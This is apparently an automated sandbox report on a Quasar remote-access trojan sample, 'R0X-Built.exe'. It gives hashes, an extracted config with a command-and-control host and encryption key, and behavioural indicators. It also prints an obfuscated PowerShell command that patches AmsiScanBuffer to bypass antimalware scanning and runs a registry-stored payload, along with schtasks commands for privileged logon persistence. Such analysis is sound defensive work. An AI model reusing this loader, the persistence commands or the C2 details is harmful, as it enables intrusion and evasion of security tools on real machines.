Analysis
-
max time kernel
158s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 06:29
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
ca46bdb39ae5def0cbcb622d2daf18ee
-
SHA1
e4fade184792a622eecbb60e6e10affd9b1f9625
-
SHA256
ffb2649845e8ebbf318b01537f3bf87fa2f3ae48a0cc5109985abbfa7e2d4bce
-
SHA512
01d8ad45700c3a24a48806256a571e239f3d76c58820a9dfbea0d5a8429e0abd965e1ce16e5e8fc275b8b9769be44a987ed3caac7da313729221ec43c073ee0c
-
SSDEEP
6144:RMb9p1kREG60olEOs1ddczFPWoqKslar9Z5fRpna0bBQv4rd5aP70A6OocBA/e9t:epiREGJDOs1dqzJNqKlaQQocBA/e9km
Malware Config
Extracted
quasar
3.1.5
Slave
looking-memphis.gl.at.ply.gg:45119
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
0LYfxXR7fIiRTzixPrdb
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4580-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmp family_quasar C:\Windows\SysWOW64\Windows\$srr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 764 created 612 764 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
$srr-powershell.exeinstall.exepid process 2196 $srr-powershell.exe 5020 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 45 ip-api.com -
Drops file in System32 directory 12 IoCs
Processes:
OfficeClickToRun.exesvchost.exeDllHost.exeR0X-Built.exe$srr-powershell.exepowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe R0X-Built.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\SysWOW64\Windows\$srr-powershell.exe R0X-Built.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 764 set thread context of 1060 764 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeSCHTASKS.exepid process 3640 schtasks.exe 3484 schtasks.exe 1400 SCHTASKS.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 764 powershell.EXE 764 powershell.EXE 764 powershell.EXE 764 powershell.EXE 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe 1060 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exeExplorer.EXEdwm.exedescription pid process Token: SeDebugPrivilege 4580 R0X-Built.exe Token: SeDebugPrivilege 2196 $srr-powershell.exe Token: SeDebugPrivilege 764 powershell.EXE Token: SeDebugPrivilege 764 powershell.EXE Token: SeDebugPrivilege 1060 dllhost.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 1016 dwm.exe Token: SeCreatePagefilePrivilege 1016 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4580 wrote to memory of 3640 4580 R0X-Built.exe schtasks.exe PID 4580 wrote to memory of 3640 4580 R0X-Built.exe schtasks.exe PID 4580 wrote to memory of 3640 4580 R0X-Built.exe schtasks.exe PID 4580 wrote to memory of 2196 4580 R0X-Built.exe $srr-powershell.exe PID 4580 wrote to memory of 2196 4580 R0X-Built.exe $srr-powershell.exe PID 4580 wrote to memory of 2196 4580 R0X-Built.exe $srr-powershell.exe PID 2196 wrote to memory of 3484 2196 $srr-powershell.exe schtasks.exe PID 2196 wrote to memory of 3484 2196 $srr-powershell.exe schtasks.exe PID 2196 wrote to memory of 3484 2196 $srr-powershell.exe schtasks.exe PID 4580 wrote to memory of 5020 4580 R0X-Built.exe install.exe PID 4580 wrote to memory of 5020 4580 R0X-Built.exe install.exe PID 4580 wrote to memory of 5020 4580 R0X-Built.exe install.exe PID 4580 wrote to memory of 1400 4580 R0X-Built.exe SCHTASKS.exe PID 4580 wrote to memory of 1400 4580 R0X-Built.exe SCHTASKS.exe PID 4580 wrote to memory of 1400 4580 R0X-Built.exe SCHTASKS.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 764 wrote to memory of 1060 764 powershell.EXE dllhost.exe PID 1060 wrote to memory of 612 1060 dllhost.exe winlogon.exe PID 1060 wrote to memory of 668 1060 dllhost.exe lsass.exe PID 1060 wrote to memory of 940 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1016 1060 dllhost.exe dwm.exe PID 1060 wrote to memory of 1044 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1116 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1124 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1140 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1148 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1224 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1308 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1332 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1372 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1416 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1576 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1596 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1652 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1696 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1724 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1772 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1828 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1880 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 1892 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2008 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2024 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2072 1060 dllhost.exe spoolsv.exe PID 1060 wrote to memory of 2164 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2240 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2380 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2388 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2520 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2528 1060 dllhost.exe sihost.exe PID 1060 wrote to memory of 2580 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2628 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2668 1060 dllhost.exe sysmon.exe PID 1060 wrote to memory of 2688 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2704 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2724 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 2736 1060 dllhost.exe taskhostw.exe PID 1060 wrote to memory of 2812 1060 dllhost.exe svchost.exe PID 1060 wrote to memory of 3092 1060 dllhost.exe unsecapp.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6b217f98-80eb-430e-a854-b5ea1035d0d9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bxJrexNUPrsE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oyGDOiatFFpECb,[Parameter(Position=1)][Type]$BUMrriBLVF)$SUlVRZaDYCV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+'yM'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'Pub'+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'ea'+[Char](108)+'e'+'d'+''+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$SUlVRZaDYCV.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+'Pub'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$oyGDOiatFFpECb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+'d');$SUlVRZaDYCV.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$BUMrriBLVF,$oyGDOiatFFpECb).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $SUlVRZaDYCV.CreateType();}$EuzzAYaxJWVgM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+'.'+'d'+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+'s'+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+'n'+'sa'+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+'d'+''+[Char](115)+'');$ZoPQybvFFOzvdH=$EuzzAYaxJWVgM.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crtwHMmDayxJUPAhQiB=bxJrexNUPrsE @([String])([IntPtr]);$PvZmALJHZRIKZPdZjXuBoH=bxJrexNUPrsE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aQTVQOagjfU=$EuzzAYaxJWVgM.GetMethod('Ge'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$eJLDJiIHrNYvOg=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$aQTVQOagjfU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$IzByyrqqbnbmKFmOx=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$aQTVQOagjfU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$svTvrlo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eJLDJiIHrNYvOg,$crtwHMmDayxJUPAhQiB).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$FmVYHKWQmcpBoOYeR=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$svTvrlo,[Object]('A'+[Char](109)+''+[Char](115)+'i'+'S'+'c'+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$dmEZpqIzdY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IzByyrqqbnbmKFmOx,$PvZmALJHZRIKZPdZjXuBoH).Invoke($FmVYHKWQmcpBoOYeR,[uint32]8,4,[ref]$dmEZpqIzdY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FmVYHKWQmcpBoOYeR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IzByyrqqbnbmKFmOx,$PvZmALJHZRIKZPdZjXuBoH).Invoke($FmVYHKWQmcpBoOYeR,[uint32]8,0x20,[ref]$dmEZpqIzdY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
